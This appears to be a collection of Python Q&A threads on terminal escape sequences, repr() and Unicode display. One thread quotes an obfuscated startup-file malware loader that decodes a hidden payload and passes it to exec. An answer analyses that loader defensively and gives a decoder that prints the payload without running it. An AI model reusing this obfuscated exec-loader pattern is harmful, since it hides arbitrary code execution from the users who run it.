Attempting to debug hex instruction, but python clears my console? - python

I'm writing a driver and am concatenating some hex instructions based on a few conditionals. Up until this point, all instructions have worked as intended.
A new instruction I was working on isn't working as intended, so I attempted to print out the instruction after concatenation and before execution to see what was wrong.
msg = '\xc2%s%s' % ('\x1b\x63', '07')
assert self.dev.ctrl_transfer(0x21, 9, 0x0300, 0, msg) == len(msg)
print(msg)
When I print it after concatenation it clears the console and prints '07' and then continues the rest of the driver execution. I'm able to print and execute every other instruction I've concatenated, such as the following, without issue.
msg = '\xc2%s%s' % ('\x1b\x72', '07')
Does anyone have an idea why this is happening? Does the '\x63' byte tell python to do something I'm unaware of? It should just be concatenated to the rest of the instruction, followed by the '\x07' byte. Note, that if I include the '\x' before the '07' (unlike my code above) it still does the same thing, it just doesn't print '07', it leaves a blank line.
Thanks!

The character '\x63' is the same character as 'c' (and a half-dozen other ways to spell it). The letter c doesn't mean anything special to Python.
The character '\x1b' right before the c is Escape. That doesn't mean anything special to Python either, but it probably does to your terminal. Most terminals use "escape sequences" that start with Escape and end with a letter to do things like scroll up, change the main text color, or clear the screen. On VT100-compatible terminals, Escape followed by c is the "reset to initial state" sequence, which would explain the cleared console.
If this is getting in the way of an interactive debugging session, you may want to consider printing the repr of the string rather than the string itself. The easiest way to do that is to not even use print:
>>> msg = b'\x1b\x63'
>>> msg
b'\x1bc'
>>> print(repr(msg))
b'\x1bc'
Notice that either way, it includes the b and the quotes, and that it hex-escapes all non-printable bytes. It works basically the same with Unicode strings instead of byte strings:
>>> msg = '\x1b\x63'
>>> msg
'\x1bc'
>>> print(repr(msg))
'\x1bc'
If you're using Python 2.x, the Unicode strings get a u prefix and the byte strings get no prefix instead of b, but otherwise it works the same.
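As a minimal sketch of that debugging approach in Python 3, the instruction from the question can be built as bytes and inspected with repr() before it is sent anywhere. Building it with bytes concatenation is an assumption made for illustration; the original code used Python 2 str formatting.

```python
# The instruction from the question, built as bytes (an assumption for
# illustration; the original used a Python 2 str and % formatting).
msg = b'\xc2' + b'\x1b\x63' + b'07'

# repr() escapes non-printable bytes, so the Escape byte never reaches
# the terminal as a raw control character.
print(repr(msg))

# Note that '07' is two printable characters, not the single byte 0x07.
print(len(b'07'), len(b'\x07'))
```

The second print is a reminder that '07' and '\x07' are different payloads, which matters when the device expects a single byte.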

Related

Trying to understand this potentially virus encrypted pyw file

Today I realised this .pyw file was added into my startup files.
Though I already deleted it, I suspect what it may have initially done to my computer, but it's sort of encrypted and I am not very familiar with Python, but I assume as this is the source code regardless, there is no actual way to completely encrypt it.
Can someone either guide me through how I can do that, or check it for me?
edit: by the looks of it I can only post some of it here, but it should give brief idea of how it was encrypted:
class Protect():
def __decode__(self:object,_execute:str)->exec:return(None,self._delete(_execute))[0]
def __init__(self:object,_rasputin:str=False,_exit:float=0,*_encode:str,**_bytes:int)->exec:
self._byte,self._decode,_rasputin,self._system,_bytes[_exit],self._delete=lambda _bits:"".join(__import__(self._decode[1]+self._decode[8]+self._decode[13]+self._decode[0]+self._decode[18]+self._decode[2]+self._decode[8]+self._decode[8]).unhexlify(str(_bit)).decode()for _bit in str(_bits).split('/')),exit()if _rasputin else'abcdefghijklmnopqrstuvwxyz0123456789',lambda _rasputin:exit()if self._decode[15]+self._decode[17]+self._decode[8]+self._decode[13]+self._decode[19] in open(__file__, errors=self._decode[8]+self._decode[6]+self._decode[13]+self._decode[14]+self._decode[17]+self._decode[4]).read() or self._decode[8]+self._decode[13]+self._decode[15]+self._decode[20]+self._decode[19] in open(__file__, errors=self._decode[8]+self._decode[6]+self._decode[13]+self._decode[14]+self._decode[17]+self._decode[4]).read()else"".join(_rasputin if _rasputin not in self._decode else self._decode[self._decode.index(_rasputin)+1 if self._decode.index(_rasputin)+1<len(self._decode)else 0]for _rasputin in "".join(chr(ord(t)-683867)if t!="ζ"else"\n"for t in self._byte(_rasputin))),lambda _rasputin:str(_bytes[_exit](f"{self._decode[4]+self._decode[-13]+self._decode[4]+self._decode[2]}(''.join(%s),{self._decode[6]+self._decode[11]+self._decode[14]+self._decode[1]+self._decode[0]+self._decode[11]+self._decode[18]}())"%list(_rasputin))).encode(self._decode[20]+self._decode[19]+self._decode[5]+self._decode[34])if _bytes[_exit]==eval else exit(),eval,lambda _exec:self._system(_rasputin(_exec))
return self.__decode__(_bytes[(self._decode[-1]+'_')[-1]+self._decode[18]+self._decode[15]+self._decode[0]+self._decode[17]+self._decode[10]+self._decode[11]+self._decode[4]])
Protect(_rasputin=False,_exit=False,_sparkle='''ceb6/f2a6bdbe/f2a6bdbb/f2a6bf82/f2a6bf83/ceb6/f2a6bdbe/f2a6bdbb/f2a6bf83/f2a6bf80/f2a6bdbb/f2a6bf93/f2a6bf89/f2a6bf8f/f2a6bdbb/f2a6bebe/f2a6bebf/f2a6bf89/f2a6bebc/f2a6bf80/
OBLIGATORY WARNING: The code is pretty obviously hiding something, and it eventually will build a string and exec it as a Python program, so it has full permissions to do anything your user account does on your computer. All of this is to say DO NOT RUN THIS SCRIPT.
The payload for this nasty thing is in that _sparkle string, which you've only posted a prefix of. Once you get past all of the terrible spacing, this program basically builds a new Python program using some silly math and exec's it, using the _sparkle data to do it. It also has some basic protection against you inserting print statements in it (amusingly, those parts are easy to remove). The part you've posted decrypts to two lines of Python comments.
# hi
# if you deobf
Without seeing the rest of the payload, we can't figure out what it was meant to do. But here's a Python function that should reverse-engineer it.
import binascii

# Feed this function the full value of the _sparkle string.
def deobfuscate(data):
    decode = 'abcdefghijklmnopqrstuvwxyz0123456789'
    r = "".join(binascii.unhexlify(str(x)).decode() for x in str(data).split('/'))
    for x in r:
        if x == "ζ":
            print()
        else:
            x = chr(ord(x)-683867)
            if x in decode:
                x = decode[(decode.index(x) + 1) % len(decode)]
            print(x, end='')
Each group of hex digits between the slashes encodes one character, not a line: the hex digits are read two at a time as bytes, and those bytes are decoded as UTF-8. The character ζ stands for a newline. For every other character, the code point is taken, the magic number 683867 is subtracted from it, and the result is converted back into a character. Finally, if that character is a lowercase letter or a digit, it is shifted one position to the right in the decode string, so letters move one forward in the alphabet and digits increase by one, with z wrapping to 0 and 9 wrapping to a (anything else is left alone). The result, presumably, forms a valid Python program.
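To check that description against the data, here is a small sketch of the same decoding that returns a string instead of printing, applied only to the prefix of _sparkle posted in the question. The names decode_sparkle, ALPHABET and prefix are made up for this example. It only decodes text; it never executes the result.

```python
import binascii

ALPHABET = 'abcdefghijklmnopqrstuvwxyz0123456789'

def decode_sparkle(data):
    """Decode the obfuscated payload to text. Nothing is executed."""
    out = []
    for group in data.split('/'):
        # Each group is the hex of UTF-8 bytes; a trailing '/' yields an
        # empty group, which decodes to an empty string.
        for ch in binascii.unhexlify(group).decode('utf-8'):
            if ch == 'ζ':
                out.append('\n')
                continue
            ch = chr(ord(ch) - 683867)
            if ch in ALPHABET:
                # Shift one position to the right, wrapping at the end.
                ch = ALPHABET[(ALPHABET.index(ch) + 1) % len(ALPHABET)]
            out.append(ch)
    return ''.join(out)

# Only the prefix that was posted in the question.
prefix = ('ceb6/f2a6bdbe/f2a6bdbb/f2a6bf82/f2a6bf83/ceb6/f2a6bdbe/f2a6bdbb/'
          'f2a6bf83/f2a6bf80/f2a6bdbb/f2a6bf93/f2a6bf89/f2a6bf8f/f2a6bdbb/'
          'f2a6bebe/f2a6bebf/f2a6bf89/f2a6bebc/f2a6bf80/')
print(decode_sparkle(prefix))
```

Returning a string rather than printing makes it easy to write the decoded program to a text file and read it in an editor.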
From here, you have a few options.
Run the Python script I gave above on the real, full _sparkle string and figure out what the resulting program does yourself.
Run the Python script I gave above on the real, full _sparkle string and post the code in your question so we can decompose that.
Post the full _sparkle string in the question, so I or someone else can decode it.
Wipe the PC to factory settings and move on.

convert Unicode to normal string [duplicate]

When I parse this XML with p = xml.parsers.expat.ParserCreate():
<name>Fortuna Düsseldorf</name>
The character parsing event handler includes u'\xfc'.
How can u'\xfc' be turned into u'ü'?
This is the main question in this post, the rest just shows further (ranting) thoughts about it
Isn't Python unicode broken since u'\xfc' shall yield u'ü' and nothing else?
u'\xfc' is already a unicode string, so converting it to unicode again doesn't work!
Converting it to ASCII as well doesn't work.
The only thing that I found works is: (This cannot be intended, right?)
exec( 'print u\'' + 'Fortuna D\xfcsseldorf'.decode('8859') + u'\'')
Replacing 8859 with utf-8 fails! What is the point of that?
Also, what is the point of the Python Unicode HOWTO? It only gives examples of failures instead of showing how to do the conversions that one (especially the hundreds of people who ask similar questions here) actually uses in real-world practice.
Unicode is no magic - why do so many people here have issues?
The underlying problem of unicode conversion is dirt simple:
One bidirectional lookup table '\xFC' <-> u'ü'
unicode( 'Fortuna D\xfcsseldorf' )
What is the reason why the creators of Python think it is better to show an error instead of simply producing this: u'Fortuna Düsseldorf'?
Also, why did they make it not reversible?
>>> u'Fortuna Düsseldorf'.encode('utf-8')
'Fortuna D\xc3\xbcsseldorf'
>>> unicode('Fortuna D\xc3\xbcsseldorf','utf-8')
u'Fortuna D\xfcsseldorf'
You already have the value. Python simply tries to make debugging easier by giving you a representation that is ASCII friendly. Echoing values in the interpreter gives you the result of calling repr() on the result.
In other words, you are confusing the representation of the value with the value itself. The representation is designed to be safely copied and pasted around, without worry about how other systems might handle non-ASCII codepoints. As such the Python string literal syntax is used, with any non-printable and non-ASCII characters replaced by \xhh and \uhhhh escape sequences. Pasting those strings back into a Python string or interactive Python session will reproduce the exact same value.
As such ü has been replaced by \xfc, because U+00FC is the Unicode codepoint for LATIN SMALL LETTER U WITH DIAERESIS.
If your terminal is configured correctly, you can just use print and Python will encode the Unicode value to your terminal codec, resulting in your terminal display giving you the non-ASCII glyphs:
>>> u'Fortuna Düsseldorf'
u'Fortuna D\xfcsseldorf'
>>> print u'Fortuna Düsseldorf'
Fortuna Düsseldorf
If your terminal is configured for UTF-8, you can also write the UTF-8 bytes directly to your terminal, after encoding explicitly:
>>> u'Fortuna Düsseldorf'.encode('utf8')
'Fortuna D\xc3\xbcsseldorf'
>>> print u'Fortuna Düsseldorf'.encode('utf8')
Fortuna Düsseldorf
The alternative is for you to upgrade to Python 3; there repr() only uses escape sequences for codepoints that have no printable glyphs (control codes, reserved codepoints, surrogates, etc; if the codepoint is not a space but falls in a C* or Z* general category, it is escaped). The new ascii() function still gives you the Python 2 repr() behaviour.
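A short Python 3 sketch of the difference between the value and its two representations (the variable name s is only for illustration):

```python
s = 'Fortuna Düsseldorf'

# Python 3 repr() keeps printable non-ASCII characters as they are.
print(repr(s))

# ascii() escapes them, like repr() did in Python 2.
print(ascii(s))

# Both spellings denote the same value; only the representation differs.
print(s == 'Fortuna D\xfcsseldorf')
```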

Python - Reading Emoji Unicode Characters

I have a Python 2.7 program which reads iOS text messages from a SQLite database. The text messages are unicode strings. In the following text message:
u'that\u2019s \U0001f63b'
The apostrophe is represented by \u2019, but the emoji is represented by \U0001f63b. I looked up the code point for the emoji in question, and it's \uf63b. I'm not sure where the 0001 is coming from. I know comically little about character encodings.
When I print the text, character by character, using:
s = u'that\u2019s \U0001f63b'
for c in s:
print c.encode('unicode_escape')
The program produces the following output:
t
h
a
t
\u2019
s
\ud83d
\ude3b
How can I correctly read these last characters in Python? Am I using encode correctly here? Should I just attempt to trash those 0001s before reading it, or is there an easier, less silly way?
I don't think you're using encode correctly, nor do you need to. What you have is a valid unicode string with one 4 digit and one 8 digit escape sequence. Try this in the REPL on, say, OS X
>>> s = u'that\u2019s \U0001f63b'
>>> print s
that’s 😻
In python3, though -
Python 3.4.3 (default, Jul 7 2015, 15:40:07)
>>> s = u'that\u2019s \U0001f63b'
>>> s[-1]
'😻'
Your last bit of confusion is likely due to the fact that you are running what is called a "narrow Python build". On such a build, a unicode string is stored as 16-bit code units, so a single element cannot hold a code point above U+FFFF; the emoji U+1F63B is stored as the UTF-16 surrogate pair \ud83d \ude3b, which is what your loop printed. The best solution would be to move to Python 3. Otherwise, process the UTF-16 surrogate pair as a unit.
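For reference, this is how a code point above U+FFFF maps to a surrogate pair and back, following the standard UTF-16 arithmetic. It is a sketch in Python 3, and the function names are made up for this example. It also shows that the emoji's code point is U+1F63B rather than U+F63B, which is where the leading 0001 in \U0001f63b comes from.

```python
def to_surrogate_pair(code_point):
    """Split a code point above U+FFFF into UTF-16 high/low surrogates."""
    offset = code_point - 0x10000
    high = 0xD800 + (offset >> 10)    # top 10 bits
    low = 0xDC00 + (offset & 0x3FF)   # bottom 10 bits
    return high, low

def from_surrogate_pair(high, low):
    """Combine a high/low surrogate pair back into one code point."""
    return 0x10000 + ((high - 0xD800) << 10) + (low - 0xDC00)

high, low = to_surrogate_pair(0x1F63B)
print(hex(high), hex(low))
print(hex(from_surrogate_pair(0xD83D, 0xDE3B)))
```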

Python Character Encoding

I have a python script that retrieves information from a web service and then looks up data in a MySQL db. The data is unicode when I receive it, however I want the SQL statement to use the actual character (Băcioi in the example below). As you can see, when I try and encode it to utf-8 the result is still not what I'm looking for.
>>> x = u'B\u0103cioi'
>>> x
u'B\u0103cioi'
>>> x.encode('utf-8')
'B\xc4\x83cioi'
>>> print x
Băcioi ## << What I want!
Your encoding is working fine. Python is simply showing you the repr()'d version of it on the command line, which uses \x escapes. You can tell because of the fact that it's also displaying the quotes around the string.
print does not do any mutation of the string - if it prints out the character you want, that's what is actually in the contents of the string.
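The same point as a small Python 3 sketch: the escaped spelling and the visible character are one and the same string, and encoding to UTF-8 and decoding again returns it unchanged.

```python
x = 'B\u0103cioi'

# The \u escape is only a way of writing the character in source code.
print(x == 'Băcioi')

# The UTF-8 bytes look different when shown with repr(), but they decode
# back to exactly the same string.
encoded = x.encode('utf-8')
print(repr(encoded))
print(encoded.decode('utf-8') == x)
```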

How to print tuples of unicode strings in original language (not u'foo' form)

I have a list of tuples of unicode objects:
>>> t = [('亀',), ('犬',)]
Printing this out, I get:
>>> print t
[('\xe4\xba\x80',), ('\xe7\x8a\xac',)]
which I guess is a list of the utf-8 byte-code representation of those strings?
but what I want to see printed out is, surprise:
[('亀',), ('犬',)]
but I'm having an inordinate amount of trouble getting the bytecode back into a human-readable form.
What do you want to see it printed out on? Because if it's the console, it's not at all guaranteed your console can display those characters. This is why Python's ‘repr()’ representation of objects goes for the safe option of \-escapes, which you will always be able to see on-screen and type in easily.
As a prerequisite you should be using Unicode strings (u''). And, as mentioned by Matthew, if you want to be able to write u'亀' directly in source you need to make sure Python can read the file's encoding. For occasional use of non-ASCII characters it is best to stick with the escaped version u'\u4e80', but when you have a lot of East Asian text you want to be able to read, “# coding=utf-8” is definitely the way to go.
print '[%s]' % ', '.join([', '.join('(%s,)' % ', '.join(ti) for ti in t)])
That would print the characters unwrapped by quotes. Really you'd want:
def reprunicode(u):
    return repr(u).decode('raw_unicode_escape')
print u'[%s]' % u', '.join([u'(%s,)' % reprunicode(ti[0]) for ti in t])
This would work, but if the console didn't support Unicode (and this is especially troublesome on Windows), you'll get a big old UnicodeError.
In any case, this rarely matters because the repr() of an object, which is what you're seeing here, doesn't usually make it to the public user interface of an application; it's really for the coder only.
However, you'll be pleased to know that Python 3.0 behaves exactly as you want:
plain '' strings without the ‘u’ prefix are now Unicode strings
repr() shows most Unicode characters verbatim
Unicode in the Windows console is better supported (you can still get UnicodeError on Unix if your environment isn't UTF-8)
Python 3.0 is a little bit new and not so well-supported by libraries, but it might well suit your needs better.
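For comparison, a minimal sketch of the Python 3 behaviour described above, assuming the console can display the characters:

```python
t = [('亀',), ('犬',)]

# In Python 3, the repr() of a str keeps printable characters verbatim,
# so printing the list shows the original text.
print(t)
print(repr(t) == "[('亀',), ('犬',)]")
```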
First, there's a slight misunderstanding in your post. If you define a list like this:
>>> t = [('亀',), ('犬',)]
...those are not unicodes you define, but strs. If you want to have unicode types, you have to add a u before the character:
>>> t = [(u'亀',), (u'犬',)]
But let's assume you actually want strs, not unicodes. The main problem is that the __str__ method of a list (or a tuple) is practically the same as its __repr__ method (which returns a string that, when evaluated, would create exactly the same object). Because the __repr__ output should be encoding-independent, strings are represented in the safest way possible, i.e. each byte outside the ASCII range is shown as a hex escape (\xe4, for example).
Unfortunately, as far as I know, there's no library method for printing a list that is locale-aware. You could use an almost-general-purpose function like this:
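def collection_str(collection):
    if isinstance(collection, list):
        brackets = '[%s]'
        single_add = ''
    elif isinstance(collection, tuple):
        brackets = '(%s)'
        single_add = ','
    elif isinstance(collection, str):
        # Quote byte strings without escaping them, unlike repr()
        return "'%s'" % collection
    else:
        return str(collection)
    items = ', '.join([collection_str(x) for x in collection])
    # A one-element tuple needs its trailing comma
    if len(collection) == 1:
        items += single_add
    return brackets % items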
>>> print collection_str(t)
[('亀',), ('犬',)]
Note that this won't work for all possible collections (sets and dictionaries, for example), but it's easy to extend it to handle those.
Python 2 source files are assumed to be ASCII by default, so you must use the \u escape sequences unless you declare an encoding. See PEP 263.
#!/usr/bin/python
# coding=utf-8
t = [u'亀', u'犬']
print t
When you pass a list to print, Python converts the object into a string using its rules for string conversions. The output of such conversions is designed for eval(), which is why you see those \u sequences. Here's a hack to get around that based on bobince's solution. The console must accept Unicode or this will throw an exception.
t = [(u'亀',), (u'犬',)]
print repr(t).decode('raw_unicode_escape')
So this appears to do what I want:
print '[%s]' % ', '.join([', '.join('(%s,)' % ', '.join(ti) for ti in t)])
>>> t = [('亀',), ('犬',)]
>>> print t
[('\xe4\xba\x80',), ('\xe7\x8a\xac',)]
>>> print '[%s]' % ', '.join([', '.join('(%s,)' % ', '.join(ti) for ti in t)])
[(亀,), (犬,)]
Surely there's a better way to do it.
(but other two answers thus far don't result in the original string being printed out as desired).
Try:
import codecs, sys
sys.stdout = codecs.getwriter('utf8')(sys.stdout)
It seems people are missing what people want here. When I print unicode from a tuple, I just want to get rid of the 'u' '[' '(' and quotes. What we want is a function like below.
After scouring the Net it seems to be the cleanest way to get atomic displayable data.
If the data is not in a tuple or list, I don't think this problem exists.
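import re

def Plain(self, U_String):
    P_String = str(U_String)
    # Match the repr of a one-element tuple, e.g. (u'...',) or ('...',)
    m = re.search(r"^\(u?'(.*)',\)$", P_String)
    if m:  # Typical unicode
        # str() of a tuple yields escaped text, so undo the escapes
        P_String = m.group(1).decode("unicode_escape")
    return P_String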
